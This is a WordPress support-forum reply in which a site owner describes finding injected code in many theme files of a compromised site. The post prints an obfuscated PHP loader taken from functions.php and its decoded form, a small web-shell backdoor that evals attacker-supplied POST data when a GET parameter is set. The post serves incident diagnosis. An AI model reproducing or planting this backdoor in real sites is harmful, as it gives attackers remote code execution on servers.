Support

Account

Home Forums General Issues Bug or not in acf.php Reply To: Bug or not in acf.php

  • Hello John,

    I think that right and maybe it’s not a problem about your plugin (thinking because i just found yesterday “acf.php”

    When i look for “$_POST[‘dd’]” in the directory, i have many more files modified more than 1 month…

    I found these files :

    wp-content/themes/yoo_balance_wp/comments.php
    wp-content/themes/yoo_balance_wp/sidebar.php
    wp-content/themes/yoo_balance_wp/changelog.php
    wp-content/themes/yoo_balance_wp/404.php
    wp-content/themes/yoo_balance_wp/footer.php
    wp-content/themes/yoo_balance_wp/config.php
    wp-content/themes/yoo_balance_wp/layouts/attachment.php
    wp-content/themes/yoo_balance_wp/layouts/template.config.php
    wp-content/themes/yoo_balance_wp/layouts/template.php
    wp-content/themes/yoo_balance_wp/layouts/_post.php
    wp-content/themes/yoo_balance_wp/layouts/page.php
    wp-content/themes/yoo_balance_wp/layouts/page.php
    wp-content/themes/yoo_balance_wp/layouts/module.php
    wp-content/themes/yoo_balance_wp/layouts/single.php
    wp-content/themes/yoo_balance_wp/header.php
    wp-content/themes/yoo_balance_wp/index.php
    wp-content/themes/yoo_balance_wp/functions.php
    wp-content/themes/yoo_balance_wp/functions.php
    wp-content/themes/yoo_balance_wp/cache/index.php

    About :

    /home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php

    I found at the beginning

    <?php
    $O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
    $O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
    $O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
    $OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
    $OO0000 = $O00OO0{7} . $O00OO0{13};
    $O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
    eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51
    QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0F
    DTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU
    1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9Ijtld
    mFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
    ?> 

    That’s mean

    
    <?php
    $fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
    echo apiRequest();
    function apiRequest(){
    	if(@$_GET['op'] == 'check')
    		{
    		 return "connectjbmoveisok";
    		 exit();
    	    }
    }
    ?> 
    

    So i think it’s not the good place, and it’s not your plugin.

    Sorry for the time you lost !
    I continue to analyse